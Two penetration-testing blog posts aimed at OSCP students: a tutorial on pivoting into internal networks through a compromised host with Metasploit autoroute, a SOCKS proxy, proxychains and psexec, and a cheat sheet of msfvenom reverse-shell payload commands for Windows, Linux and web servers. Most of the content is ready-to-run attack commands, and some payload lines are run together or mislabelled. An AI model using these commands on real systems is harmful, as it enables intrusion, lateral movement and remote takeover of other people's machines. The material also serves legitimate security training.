Tips & Tricks

Pivoting to Attack Remote Networks Through Meterpreter Sessions and Proxychains


How to configure the tools

Once you have a Meterpreter session for a compromised machine, you can utilize Metasploit to start leveraging that machine as a proxy. This is very useful, as you will be able to run tools from your attacker system, outside the network, against systems that are local to the network you’ve compromised a single host on.

Configuring the route in Metasploit

To begin, we’re going to assume you already have an active Meterpreter session. We’ll start by backgrounding your Meterpreter session, and using the following module.
use post/multi/manage/autoroute

There will be an option where you can select the victim session.
set SESSION 1

And configure the victim’s subnet. Any traffic issued by Metasploit to an address within this subnet will be routed through the previously selected session.
set SUBNET 10.0.0.0/24

You can run the following command to confirm your route has been successfully created.
route print

Configuring the Socks4 Proxy

Now that we have the route configured, we’ll switch to a different module.
use auxiliary/server/socks_proxy
set VERSION 4a

Once running, this module will forward any traffic issue to its SRVHOST and SRVPORT through the Metasploit routing table. Since we just added an entry in our routing table to send traffic through Meterpreter session 1, this should allow us the ability to utilize tools on our local attacking system. If the default port of 1080 works for you, leave the default and run the module.
run

Now, let’s head over to our attacker system and adjust our Proxychains configuration file.
sudo vi /etc/proxychains.conf

Adjust the last line of the file to route traffic through the Socks4 proxy listening at 127.0.0.1 on port 1080 (this is the configuration of our socks4a module in Metasploit).
socks4 127.0.0.1 1080

Running tools through the proxy

Finally, we can now utilize tools on our local filesystem to interact with hosts on the remote network.
proxychains ssh root@<remoteHost>

To utilize Nmap, you’ll need additional flags. Your scan will also take longer than it would without the pivot.
sudo proxychains nmap -sT -Pn -n <targetIP> --top-ports 50

To open a web browser that routes through the proxy, you can use:
proxychains firefox

Alternatively, you could also configure your browser to route through the proxy in the advanced settings, or you could leverage a add-in, such as FoxyProxy.

Keep in mind that since we’re routing traffic through the Meterpreter session, this session needs to stay active in order for us to reach hosts on the remote subnet. Also note that some tools, such as the default Nmap scan, may not work as they would if you were scanning a target directly.


Exploitation via pivoting

Once a route has been set up in Metasploit, you can now communicate to any host that the compromised host can communicate to. Assuming you know valid user credentials (or a NTLM hash), we can leverage PSExec to gain a shell on the remote system.
use exploit/windows/smb/psexec

Before running the above mentioned module, make sure you’ve already configured a route in Metasploit that will forward traffic destined to the remote machine through your active Meterpreter session.

In the event that the remote machine you wish to target does not have access to the internet, you can add a 2nd route in Metasploit so that traffic destined to address of your existing compromised connection will route through the Metasploit routing table. This would allow you to configure the LHOST of your Meterpreter payload to the local IP address on the host of your existing Meterpreter session.


Cleaning Up

It’s always important to clean up once you’re finished. From within Metasploit, we can stop the Socks4 proxy by running the following command to kill all jobs.
jobs -K

Then you can flush the routing table entry you configured.
route flush

Tips & Tricks

MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)

Encrypt and Anonymize Your Internet Connection for as Little as $3/mo with PIA VPN. Learn More

There are tons of cheatsheets out there, but I couldn’t find a comprehensive one that includes non-Meterpreter shells. I will include both Meterpreter, as well as non-Meterpreter shells for those studying for OSCP.

Table of Contents:
– Non Meterpreter Binaries
– Non Meterpreter Web Payloads
– Meterpreter Binaries
– Meterpreter Web Payloads


Non-Meterpreter Binaries

Staged Payloads for Windows

x86msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Stageless Payloads for Windows

x86 msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64 msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Staged Payloads for Linux

x86msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64 msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Stageless Payloads for Linux

x86 msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64 msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Non-Meterpreter Web Payloads

aspmsfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
jspmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
warmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
phpmsfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

Meterpreter Binaries

Staged Payloads for Windows

x86msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Stageless Payloads for Windows

x86msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Staged Payloads for Linux

x86msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Stageless Payloads for Linux

x86msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Meterpreter Web Payloads

aspmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
jspmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > example.jsp
warmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > example.war
phpmsfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php

Donations and Support:
Like my content? Please consider supporting me on Patreon:
https://www.patreon.com/infinitelogins

Purchase a VPN Using my Affiliate Link
https://www.privateinternetaccess.com/pages/buy-vpn/infinitelogins

👇 SUBSCRIBE TO INFINITELOGINS YOUTUBE CHANNEL NOW 👇
https://www.youtube.com/c/infinitelogins?sub_confirmation=1